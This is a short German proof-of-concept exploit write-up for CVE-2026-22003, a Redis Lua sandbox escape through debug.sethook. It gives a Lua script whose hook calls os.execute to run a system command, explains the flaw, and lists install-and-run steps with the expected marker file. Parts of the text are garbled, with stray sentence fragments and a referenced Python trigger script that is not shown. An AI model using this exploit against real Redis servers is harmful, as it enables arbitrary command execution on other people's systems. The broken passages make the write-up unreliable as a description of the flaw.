
Proof-of-Concept-Exploit für CVE-2026-22003, der die Redis-Lua-Sandbox-Umgehung über debug.sethook demonstriert, um beliebige Systembefehle auszuführen.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
Die Redis-Lua-Sandbox deaktiviert die Funktion debug.sethook nicht ordnungsgemäß. Ein Angreifer, der Lua-Skripte ausführen kann, kann einen Hook installieren, der in einem privilegierten Kontext ausgeführt wird, und die Sandbox verlassen, um beliebige Systembefehle auszuführen.
os.execute oder ähnliche Funktionen aufrufen können.EVAL erlaubt).pip install redis
python trigger_redis_sandbox_escape.py
Die Datei /tmp/redis_escape wird erstellt, was die Befehlsausführung beweist.